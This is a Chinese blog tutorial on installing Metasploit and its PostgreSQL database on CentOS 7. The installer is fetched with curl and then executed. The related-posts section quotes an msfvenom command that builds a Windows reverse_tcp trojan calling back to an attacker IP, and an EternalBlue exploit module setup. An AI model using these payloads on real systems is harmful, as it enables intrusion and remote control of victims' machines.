渗透测试:CentOS 7 环境下 MSF 工具部署(Metasploit 渗透测试框架安装)

已于 2024-01-23 18:19:48 修改
阅读量1.5k 收藏 23
点赞数 23
分类专栏: 渗透测试 镜瞳知识库 文章标签: centos linux postgresql 网络安全 服务器
于 2024-01-22 16:16:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zatongtong/article/details/135744217
版权

目录

前言

Metasploit 介绍

环境准备

开始部署

官网命令一键安装

百度网盘资源安装

postgresql数据库部署

数据库安装

数据库初始化

验证

问题处理

框架升级

因执行升级命令,导致工具无法使用

前言

本文主要介绍 Metasploit 渗透测试框架安装部署,可能大家对 Metasploit 渗透测试框架比较陌生,但是这个框架下有一个很出名的工具:msfconsole,也就是大名鼎鼎的渗透测试工具 MSF。

这个工具是集成在 Kali 系统内,但是有的时候我们需要在云服务器上部署这个工具,而云服务器厂商大部分都不提供 Kali 镜像,所以需要在其他的 Linux 平台上部署该工具。

Metasploit 介绍

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

msfconsole是metasploit中的一个工具,msfconsole集成了很多漏洞的利用的脚本,是一款非常出名且好用的网络安全工具

环境准备

需要一台 Linux 系统服务器,若没有服务器可使用虚拟机代替

虚拟机创建详细请参考我以前的文章 CentOS 7 环境准备

开始部署

metasploit 官网                百度网盘        

官网命令一键安装

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

运行该命令可以直接一键安装 Metasploit 框架(在下载安装脚本的时候,会出现无法下载的情况,这时候就需要挂个梯子,或者下载百度网盘内的脚本进行安装)

百度网盘资源安装

下载百度网盘的安装脚本,进行安装

将安装脚本上传到系统内,执行以下命令进行安装 

chmod 755 msfinstall.sh && ./msfinstall.sh

注意:安装过程中需要保证网络畅通

如果自己没有梯子,建议使用百度网盘资源安装,效果一样的,都是先下载安装脚本,然后执行。

命令执行界面如下

下载安装软件包的时间大概要 20 多分钟,建议执行命令后整杯茶边喝边等(~ ̄▽ ̄)~

出现该界面说明软件安装完成,我系统安装的是中文环境,英文环境界面类似

验证是否安装成功,输入 msfconsole 验证是否能够正常进入控制台

展示图像有区别没关系,每次进入命令行所展示的图像都不一样,出现命令行控制界面就说明软件安装成功了。

进入控制台,查看数据库是否连接

msfconsole
# 进入 msf 控制台

db_status
# 查看数据库连接状态

数据库并没有连接,需要我们自己手动安装

貌似新版本的 Metasploit 不会自动安装数据库,所以我们在部署的时候,还需要额外部署一下数据库

postgresql数据库部署

数据库安装

下载 epel 仓库,并更新仓库源(若服务器本来就有这个仓库,可跳过这一步)

yum -y install epel-release
# 下载仓库

yum clean all && yum makecache
# 更新仓库配置

因为 YUM 仓库好像没有这个数据库的软件包,所以我们要安装第三方仓库

下载 rpm 软件包

yum -y install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

数据库安装以及初始化

yum -y install postgresql
# 安装客户端

yum -y install postgresql-server
# 安装服务端

postgresql-setup initdb
# 初始化数据库

启动数据库并设置数据库开机自启动

systemctl start postgresql
# 启动数据库

systemctl enable postgresql
# 数据库开机自启动

数据库初始化

在数据库初始化的过程中,不能使用 root 账户进行初始化,所以我们需要创建一个新的账户,对数据库进行初始化,并将初始化产生的配置文件复制到相应的目录内。

执行以下命令即可

useradd msf
# 创建用户 msf

su msf
# 登录 msf 账户

/opt/metasploit-framework/bin/msfdb init
# 以 msf 账户身份初始化数据库

exit
# 推出账户 msf ,回到 root 账户

cp /home/msf/.msf4/database.yml /opt/metasploit-framework/embedded/framework/config/
# 复制配置文件

验证

登录到 msf 控制界面,输入命令查看数据库是否连接成功

msfconsole
# 登录 msf 控制台

db_status
# 查看数据库连接情况

数据库连接成功,到这里 MSF 工具就部署好了

问题处理

框架升级

当我们进入 MSF 控制界面,如果工具版本过低,他会提升我们升级版本

这个时候我们只用照着提示,进入 msfconsole 交互界面(或者不用进入交互界面,直接在系统命令界面执行)后,运行 msfupdate 命令即可

如果是刚刚部署的环境,执行完命令后大概率是会出现这个界面

不更新不会影响工具的使用。

因执行升级命令,导致工具无法使用

为啥要说这一条升级的命令,就是因为这条命令非常抽象,它会把你集成在系统内的MSF命令全部干掉,顺便非常贴心的把你的软链接给全部清除 (* ̄︿ ̄)

清除就算了,还给你返回 “已安装并且是最新版本 无须任何处理” 是最气人的 (╯‵□′)╯︵┻━┻

分两步走,重新创建软链接和添加系统环境变量

1、重新创建软链接

ln -s /opt/metasploit-framework/bin/msfbinscan /etc/alternatives/msfbinscan
ln -s /opt/metasploit-framework/bin/msfconsole /etc/alternatives/msfconsole
ln -s /opt/metasploit-framework/bin/msfd /etc/alternatives/msfd
ln -s /opt/metasploit-framework/bin/msfdb /etc/alternatives/msfdb
ln -s /opt/metasploit-framework/bin/msfelfscan /etc/alternatives/msfelfscan
ln -s /opt/metasploit-framework/bin/msfmachscan /etc/alternatives/msfmachscan
ln -s /opt/metasploit-framework/bin/msfpescan /etc/alternatives/msfpescan
ln -s /opt/metasploit-framework/bin/msfrop /etc/alternatives/msfrop
ln -s /opt/metasploit-framework/bin/msfrpc /etc/alternatives/msfrpc
ln -s /opt/metasploit-framework/bin/msfrpcd /etc/alternatives/msfrpcd
ln -s /opt/metasploit-framework/bin/msfupdate /etc/alternatives/msfupdate
ln -s /opt/metasploit-framework/bin/msfvenom /etc/alternatives/msfvenom
ln -s /etc/alternatives/msfconsole /usr/bin/msfconsole

其中 /opt/metasploit-framework/ 是 Metasploit 的安装目录,一般默认情况下,都是这个路径, 如果不是的话可以通过以下命令进行查找

find / -name "metasploit-framework"

2、添加系统环境变量

vi /etc/profile

# 在末尾添加这么一行 export PATH="/opt/metasploit-framework/bin:$PATH"

source /etc/profile
# 重新加载系统变量

零号·镜瞳
关注
  • 23
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CentOS 8环境下GitBlit安装部署
01-08
目录: 一.安装jdk 二.GlitBli搭建 三.Git搭建 阅读本文前建议先阅读另一篇关于Windows环境下的GitBlit部署,之后在Linux上会熟练很多哦(⊙o⊙)。传送门:Windows 10环境下 GitBlit 部署 这里采用的是Linux的发行版之一:CentOS(Community Enterprise Operating System,中文意思是:社区企业操作系统) 首先做以下几步: 1.最好使用root用户登录,免去之后的一些权限困扰; 2.在系统主文件夹的用户文件夹(usr)下创建名为java的文件夹(位置/名称都可以自己定),作为这次任务的父文件夹; 3.在刚创建
服务器CentOS7中安装msf工具
剁椒鱼头没剁椒的博客
03-25 3098
在日常使用中,模拟攻击以及测试的时候都是直接使用本地虚拟机kali中的msf工具,但是在一些测试环境中需要使用到公网,但是目前的所有的云服务商,并不会提供kali镜像,那么当使用到msf工具的时候就需要自行安装了。网上的很多关于centos安装msf工具的教程,多多少少都存在一些问题,所以,这里就总结一篇关于centos7中安装msf工具的文章。一台云服务器centos 7.X版本MetasploitMSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
内网渗透 MetasploitMSF)基础使用
最新发布
m0_59598029的博客
03-07 876
msfvenom 是 msf 生成 payload 的一个工具这里要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 里面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
CentOS 7环境安装Redis数据库详解
09-09
Redis是一个开源的、基于BSD许可证的,基于内存的、键值存储NoSQL数据本篇文章主要介绍了在CentOS 7环境安装Redis数据库详解,有兴趣的可以了解一下。
CentOS 7 下java环境JDK1.8安装配置
01-20
1. 下载Linux版JDK1.8 去Oracle官网下载linux版本的JDK1.8,Oracle官网JDK1.8下载地址,下载需要登陆,注册即可。 2. CentOS安装及配置 在CentOS7中创建目录存放JDK cd /usr/local mkdir java 使用Xftp将下载的安装包 jdk-8u241-linux-x64.tar.gz 上传至创建的目录中 并使用以下命令解压文件 tar -zxvf jdk-8u231-linux-x64.tar.gz 重命名文件,方便后面配置 mv jdk1.8.0_231 jdk1.8 配置系统环境变量 vim /etc/profile 按
Centos7下安装MongoDB
08-24
Centos7下安装MongoDB
渗透工具——kali中msf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 4827
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
Windows上安装Metasploit-(msfconsole
m0_73135216的博客
05-12 2202
平时使用metasploit一般是在kali里面,有时候使用非常的麻烦,其实Metasploit也是支持Windows的,关于很多metasploit的方法,作者觉得有点小麻烦,这里给大家带来一种最简单的方法。任务二 安装metasploit (步骤非常简单)看到这一步说明安装成功了,安装过程比较缓慢,请不要安装到C盘!这里已经运行成功了,看到别的文章要设置环境变量,这里比较简单,就没有做过多的操作,如果安装有问题,就去设置环境变量,也有可能是因为metasploit版本问题和系统版本问题。
[2023最新]Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南
kjuhfkicf154的博客
01-13 5276
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。
kali中安装使用msfconsole
wyzhxhn的博客
10-25 7271
msfconsole安装
Ubuntu 安装msfconsole
m_de_g的博客
11-25 2995
Ubuntu 安装msfconsole 1.进入到opt目录下 cd /opt/ 2.下载安装文件 msfupdate.erb sudo wget https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb 3.将文件msfupdate.erb重命名为msfinstall,并且赋予755权限,安装msf su
centos7环境下源码安装mysql5.7.16的方法详解
09-08
主要介绍了centos7环境下源码安装mysql5.7.16的方法,详细分析了centos7环境下MySQL安装的相关步骤、操作命令、配置方法与注意事项,需要的朋友可以参考下
MSF安装与简单使用
qq_23435961的博客
05-17 2873
MSF安装与使用 建议直接安装Kali,Kali是以Linux系统进行封装的。Kali系统的优点在于这个系统集合了大量的优秀的安全工具,同时还能对这些工具进行升级。其中也包含了MSF。建议是用虚拟机来运行kali系统 Kali安装可参考链接https://blog.csdn.net/qq_23435961/article/details/124821168?spm=1001.2014.3001.5502 一、远程进入MSF 打开Xshell,连接Kali系统, Linux kali 5.16.0-kali7
Centos7搭建MSF6(公网服务器搭建msf
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-15 1813
每次需要用msf测试的时候,都需要用frp把msf穿透出来,麻烦的很,索性直接把他搭建到公网服务器上,实验机为centos,网上教程非常杂乱,中途遇到很多问题,花费了大量时间解决了遇到的问题,文章非常详细,并记录下来,照着文章一步步操作,可以完美搭建。
[知识小节]LinuxMSF工具安装
网络安全知识分享
02-09 2168
vps上安装msf的过程 依次输入下面四个指令即可 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 777msf install ./msfinstall msfconsole ...
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6140
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
ubuntu安装msfconsole和直接制作外网shell
h1825819493的博客
06-28 630
optcd /opt/msfinstall7554.直接打开msf就可以使用了。
MSF安装与使用教程,超详细,附安装包和密钥
顶峰
09-26 3819
MSF教程
centos搭建msf
热门推荐
m0_52400001的博客
03-25 1万+
由于msf一直在虚拟机里面用的时候有些麻烦,所以这里把他搭建在服务器上,网上有很多教程乱七八糟的,这是我一步一步实验出来的,完美兼容! 1.安装msf 官方有提供一键安装脚本,如下: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&amp..
msf windows安装
09-02
msf windows版是Metasploit Framework在Windows操作系统上的版本。你可以在默认安装目录C:\metasploit-framework\bin中找到安装文件。安装Metasploit Framework可以使用Windows木马生成工具msfvenom,生成一个Windows平台的木马程序,然后在攻击机上运行该木马程序。例如,使用以下命令生成一个反向TCP连接的Meterpreter木马程序,并保存到C:\tool\shell.exe文件中:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP地址LPORT=10000 -f exe > C:\tool\shell.exe<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [msf windows版](https://download.csdn.net/download/baidu_35488871/12879062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [msf安装使用基本操作](https://blog.csdn.net/qq_56426046/article/details/126699431)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值